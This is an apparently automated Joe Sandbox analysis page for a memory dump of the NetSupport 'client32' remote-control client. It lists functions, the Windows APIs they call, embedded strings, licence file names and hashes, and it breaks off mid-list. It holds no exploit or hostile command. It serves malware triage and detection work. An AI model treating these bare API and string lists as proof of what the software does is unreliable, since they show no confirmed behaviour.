Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
String ID: .%d$3$8zi$8zi$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
API String ID: 1620732580-1703320517
Opcode ID: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
Opcode Fuzzy Hash: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,73AD1370,?,0000001A), ref: 11028CFD
_strrchr.LIBCMT ref: 11028D0C

Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB

Strings

ShortName, xrefs: 11028EC5
SupportsChrome, xrefs: 11029106
AssistantURL, xrefs: 110290D9
??F, xrefs: 11029290
AssistantName, xrefs: 110290AC
Name, xrefs: 11028E5E
NSMAppDataDir, xrefs: 11029015
product.dat, xrefs: 11028CC0, 11028D11
NSSConfName, xrefs: 11029075
NSSAppDataDir, xrefs: 11029045
SupportWWW, xrefs: 11028FB5
Home, xrefs: 11028EF5
SupportEMail, xrefs: 11028FE5
TechConsole, xrefs: 1102913D
TLA, xrefs: 11028F25
\, xrefs: 11028C8C
NSSName, xrefs: 11028F55
NSSTLA, xrefs: 11028F85
LongName, xrefs: 11028E95
NSSLongCaption, xrefs: 11029175
??I, xrefs: 11029317
SupportsAndroid, xrefs: 110291A2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: 5e5da01323ba10e03d8f0edd596ba5fc72ef77263ba8a74532f5134eb9e789da
Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
Opcode Fuzzy Hash: 5e5da01323ba10e03d8f0edd596ba5fc72ef77263ba8a74532f5134eb9e789da
Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

Function 110310D5 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(00698CC8,00001388), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC

Strings

&, xrefs: 11031585
*, xrefs: 11031381
, xrefs: 110313C2
8zi, xrefs: 110312DD
j, xrefs: 11031341
j0U, xrefs: 11031554
.%d, xrefs: 110313F6
Error %s unloading audiocap dll, xrefs: 11031603
pcicl32, xrefs: 110314C5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
String ID: .%d$8zi$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
API String ID: 1428277488-368936489
Opcode ID: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
Opcode Fuzzy Hash: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752

Function 110310AC Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(00698CC8,00001388), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
_sprintf.LIBCMT ref: 11031401
_setlocale.LIBCMT ref: 1103140B

Strings

&, xrefs: 11031585
*, xrefs: 11031381
, xrefs: 110313C2
8zi, xrefs: 110312D6
8zi, xrefs: 110312DD
j, xrefs: 11031341
j0U, xrefs: 11031554
.%d, xrefs: 110313F6
Error %s unloading audiocap dll, xrefs: 11031603
pcicl32, xrefs: 110314C5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
String ID: .%d$8zi$8zi$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
API String ID: 4242130455-1800246481
Opcode ID: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
Opcode Fuzzy Hash: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52

Function 110287A0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 130
librarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

wsprintfA.USER32 ref: 11028814
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
wsprintfA.USER32 ref: 11028891
CloseHandle.KERNEL32(?), ref: 110288A7
CloseHandle.KERNEL32(?), ref: 110288B0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925

Strings

", xrefs: 110287EA
Locales\%d\, xrefs: 11028881
Setting resource langid=%d, xrefs: 110288D1
8zi, xrefs: 110287B3, 110287D1, 1102881A
NSM.LIC, xrefs: 110287B9, 110288D0
pcicl32_res.dll, xrefs: 110288E9
\GetUserLang.exe", xrefs: 1102880E
SetClientResLang called, gPlatform %x, xrefs: 110287BC

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$8zi$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-2922347624
Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0

Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190
synchronizationlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
SetLastError.KERNEL32(00000078), ref: 11030D82
WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
CloseHandle.KERNEL32(?), ref: 11030DC9
FreeLibrary.KERNEL32(?), ref: 11030DD4
CloseHandle.KERNEL32(00000000), ref: 11030DDB

Strings

/247, xrefs: 11030CD6
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 11030BEA
PCIMutex, xrefs: 11030CA3, 11030CC3
SetProcessDPIAware, xrefs: 11030D66
istaUI, xrefs: 11030BCD
_debug\tracefile, xrefs: 11030C16
_debug\trace, xrefs: 11030C04

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: bee7a83e3df7b3f95528532d03ce546dbe60c8f20fd4b46cd0ad180a050a4865
Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
Opcode Fuzzy Hash: bee7a83e3df7b3f95528532d03ce546dbe60c8f20fd4b46cd0ad180a050a4865
Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51

Function 1102D360 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 289
servicesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,B6DE5DE1,?,00000000,00000000), ref: 1102D594
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
Sleep.KERNEL32(00000032), ref: 1102D5D6
CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
Sleep.KERNEL32(000003E8), ref: 1102D632
CloseHandle.KERNEL32(?), ref: 1102D65F

Strings

NSA.LIC, xrefs: 1102D6A6
>, xrefs: 1102D50B
IKS.LIC, xrefs: 1102D6B6, 1102D6BD, 1102D6ED
8zi, xrefs: 1102D442, 1102D468, 1102D4CB, 1102D617, 1102D64A
ProtectedStorage, xrefs: 1102D5A4
NSM.LIC, xrefs: 1102D697

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: 8zi$>$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2352903888
Opcode ID: 19001e532c18ea6a9dbcb2f6acd568192c976bee085ad9395785e4669baf64c2
Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
Opcode Fuzzy Hash: 19001e532c18ea6a9dbcb2f6acd568192c976bee085ad9395785e4669baf64c2
Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50

Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583

GetCurrentThreadId.KERNEL32 ref: 111037EC
GetThreadDesktop.USER32(00000000), ref: 111037F3
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
SetThreadDesktop.USER32(00000000), ref: 11103810
CloseDesktop.USER32(00000000), ref: 11103829
GetLastError.KERNEL32 ref: 11103831
CloseDesktop.USER32(00000000), ref: 11103847
GetLastError.KERNEL32 ref: 1110384F

Strings

OpenDesktop(%s) failed, e=%d, xrefs: 11103857
SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
SetThreadDesktop(%s) ok, xrefs: 1110381B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: 88af4fe7c37487da0a343cd49c952587f69f4258b66ff44595b100b64a62f3c5
Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
Opcode Fuzzy Hash: 88af4fe7c37487da0a343cd49c952587f69f4258b66ff44595b100b64a62f3c5
Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6

Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
GetLastError.KERNEL32 ref: 1115F275
wsprintfA.USER32 ref: 1115F288

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9

Strings

NSMReflect, xrefs: 1115F2C7
m_aProp, xrefs: 1115F2BA
GlobalAddAtom failed, e=%d, xrefs: 1115F282
NSMWndClass, xrefs: 1115F260
..\ctl32\wndclass.cpp, xrefs: 1115F299, 1115F2B5
NSMDropTarget, xrefs: 1115F2CE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81

Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 11110E4A
__CxxThrowException@8.LIBCMT ref: 11110E5F
GetCurrentThreadId.KERNEL32 ref: 11110E76
InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F

Strings

QueueThreadEvent, xrefs: 11110EEB
..\ctl32\Refcount.cpp, xrefs: 11110EE6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
